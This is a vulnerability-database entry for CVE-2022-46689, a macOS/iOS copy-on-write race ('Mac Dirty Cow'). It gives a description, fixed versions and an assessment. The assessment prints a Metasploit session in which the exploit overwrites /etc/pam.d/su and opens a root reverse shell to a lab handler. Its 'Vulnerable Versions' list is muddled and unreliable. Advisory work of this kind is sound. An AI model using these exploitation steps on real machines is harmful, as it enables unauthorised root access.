Attacker Value
High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2022-46689

Last updated December 21, 2022
CVE-2022-46689
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.

Add Assessment

1
Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
Gives privileged accessVulnerable in default configurationAuthenticated
Technical Analysis

Description

This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root. The vulnerability on linux is described as: “A race condition was found in the way the kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.”

Attacker Value & Exploitation

This issue was fixed in:

  • tvOS 16.2
  • macOS Monterey 12.6.2
  • macOS Ventura 13.1
  • macOS Big Sur 11.7.2
  • iOS 15.7.2
  • iPadOS 15.7.2
  • iOS 16.2
  • iPadOS 16.2
  • watchOS 9.2.

Numerous recent versions of Apple products affected makes this quite valuable for attackers. It’s not everyday we see such a reliable LPE in current versions of macOS. The vuln requires user authentication to exploit and would pair nicely with a successful phishing attempt to compromise an entire macOS environment. A metasploit module has been released for this vuln making exploitation trivial, be sure to patch!

msf6 exploit(osx/local/mac_dirty_cow) > run
[*] Started reverse TCP handler on 172.16.199.1:4446
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.wNDx86' (17204 bytes) ...
[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ...
[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[*] Running cmd:
echo '/tmp/.wNDx86 & disown' | su
[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[+] Deleted /tmp/.wNDx86
[+] Deleted /tmp/.aclP0u
[+] Deleted /tmp/.DfoZanro
[+] Deleted /tmp/.TKIGnTw0l
[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500
options
/bin/sh: line 29: options: command not found
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
uname -a
Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64
Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
macOS 11.7
tvOS 16.2
tvOS 13.1
tvOS 12.6
tvOS 16.2
tvOS 15.7
watchOS 9.2
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • Apple

Products

  • macOS,
  • tvOS,
  • tvOS,
  • tvOS,
  • tvOS,
  • tvOS,
  • watchOS
Technical Analysis